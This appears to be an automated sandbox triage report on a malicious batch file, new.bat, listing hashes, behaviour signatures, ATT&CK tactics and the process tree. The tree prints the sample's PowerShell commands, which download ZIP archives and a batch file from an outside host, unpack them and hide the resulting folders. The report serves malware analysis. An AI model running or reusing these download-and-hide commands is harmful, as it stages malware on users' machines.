496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344 | Triage

Resubmissions

15-08-2024 18:38

240815-xaelbs1hpj 10

15-08-2024 18:24

240815-w14sgawfrc 8

Analysis

max time kernel
1442s
max time network
1448s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
15-08-2024 18:38

Sharing

Report Analysis Logs

General

Target

new.bat
Size

18.0MB
MD5

35168f928a81982fc428113f484ea21e
SHA1

2029d685911c351cea2857e12c1755df330e4978
SHA256

496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344
SHA512

4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec
SSDEEP

48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Powershell Invoke Web Request.

PowerShell

pid	Process
2556	powershell.exe
2456	powershell.exe
2720	powershell.exe
2092	powershell.exe
2768	powershell.exe

Delays execution with timeout.exe 1 IoCs

pid	Process
764	timeout.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2556	powershell.exe
2092	powershell.exe
2456	powershell.exe
2720	powershell.exe
2768	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2556	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2456	powershell.exe
Token: SeDebugPrivilege	2720	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 2556	3012	cmd.exe	30
PID 3012 wrote to memory of 2556	3012	cmd.exe	30
PID 3012 wrote to memory of 2556	3012	cmd.exe	30
PID 3012 wrote to memory of 2092	3012	cmd.exe	31
PID 3012 wrote to memory of 2092	3012	cmd.exe	31
PID 3012 wrote to memory of 2092	3012	cmd.exe	31
PID 3012 wrote to memory of 764	3012	cmd.exe	32
PID 3012 wrote to memory of 764	3012	cmd.exe	32
PID 3012 wrote to memory of 764	3012	cmd.exe	32
PID 3012 wrote to memory of 2748	3012	cmd.exe	33
PID 3012 wrote to memory of 2748	3012	cmd.exe	33
PID 3012 wrote to memory of 2748	3012	cmd.exe	33
PID 3012 wrote to memory of 2456	3012	cmd.exe	34
PID 3012 wrote to memory of 2456	3012	cmd.exe	34
PID 3012 wrote to memory of 2456	3012	cmd.exe	34
PID 3012 wrote to memory of 2720	3012	cmd.exe	35
PID 3012 wrote to memory of 2720	3012	cmd.exe	35
PID 3012 wrote to memory of 2720	3012	cmd.exe	35
PID 3012 wrote to memory of 2768	3012	cmd.exe	36
PID 3012 wrote to memory of 2768	3012	cmd.exe	36
PID 3012 wrote to memory of 2768	3012	cmd.exe	36
PID 3012 wrote to memory of 2664	3012	cmd.exe	37
PID 3012 wrote to memory of 2664	3012	cmd.exe	37
PID 3012 wrote to memory of 2664	3012	cmd.exe	37

Views/modifies file attributes 1 TTPs 2 IoCs

Hidden Files and Directories

pid	Process
2748	attrib.exe
2664	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2092
- C:\Windows\system32\timeout.exe
  timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
  2⤵
  - Delays execution with timeout.exe
  PID:764
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\Downloads\Python"
  2⤵
  - Views/modifies file attributes
  PID:2748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2456
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2720
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2768
- C:\Windows\system32\attrib.exe
  attrib +h "C:\Users\Admin\Downloads\Print"
  2⤵
  - Views/modifies file attributes
  PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

Hidden Files and Directories

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
ff88f630ed81df16ea23f5a7744f7364

SHA1
10e301bdbcbde767d8a527f44a152470b91f85ef

SHA256
d91bfc496c55eb51ad8f57eeaade819e3039a59f5da98abe1c50133ff18e6095

SHA512
6286f955c81b4a4f24c3247743db84fcfb7af47c5571163c1dd6f73d18155940010c7b4d92abe658cac15a30b48f5c28b937b5a34279fd91e3dbf56e5b3bdc63

Download Submit
memory/2092-16-0x0000000002460000-0x00000000024E0000-memory.dmp

Filesize
512KB

Download
memory/2092-17-0x000000001B1B0000-0x000000001B492000-memory.dmp

Filesize
2.9MB

Download
memory/2092-18-0x00000000028A0000-0x00000000028A8000-memory.dmp

Filesize
32KB

Download
memory/2556-4-0x000007FEF46DE000-0x000007FEF46DF000-memory.dmp

Filesize
4KB

Download
memory/2556-5-0x000007FEF4420000-0x000007FEF4DBD000-memory.dmp

Filesize
9.6MB

Download
memory/2556-6-0x000000001B290000-0x000000001B572000-memory.dmp

Filesize
2.9MB

Download
memory/2556-7-0x000007FEF4420000-0x000007FEF4DBD000-memory.dmp

Filesize
9.6MB

Download
memory/2556-8-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2556-9-0x000007FEF4420000-0x000007FEF4DBD000-memory.dmp

Filesize
9.6MB

Download
memory/2556-10-0x000007FEF4420000-0x000007FEF4DBD000-memory.dmp

Filesize
9.6MB

Download